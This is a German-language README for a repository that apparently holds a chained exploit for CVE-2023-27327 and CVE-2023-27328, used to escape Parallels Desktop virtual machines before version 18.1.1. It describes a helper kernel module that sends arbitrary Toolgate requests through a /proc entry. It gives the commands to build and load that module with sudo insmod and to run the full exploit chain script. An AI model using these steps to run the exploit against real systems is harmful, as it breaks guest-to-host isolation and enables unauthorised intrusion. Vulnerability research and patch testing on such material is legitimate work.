
Exploits für CVE-2023-27327 und CVE-2023-27328
Dieses Repository enthält Exploits für CVE-2023-27327 und CVE-2023-27328, die zusammen verwendet werden können, um eine virtuelle Maschine von Parallels Desktop zu entkommen, vor Parallels Desktop 18.1.1.
Es enthält auch Code für ein erforderliches Kernelmodul, in prl_mod, das verwendet werden kann, um beliebige Toolgate-Anfragen (< Opcode 0x8000) aus dem Userland zu senden, unter Verwendung eines Proc-Eintrags, der unter /proc/driver/prl_tg_pwn erstellt wurde.
Kernelmodul erstellen und laden:
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
Exploit ausführen:
cd ..
pip install -r requirements.txt
./3_full_chain.py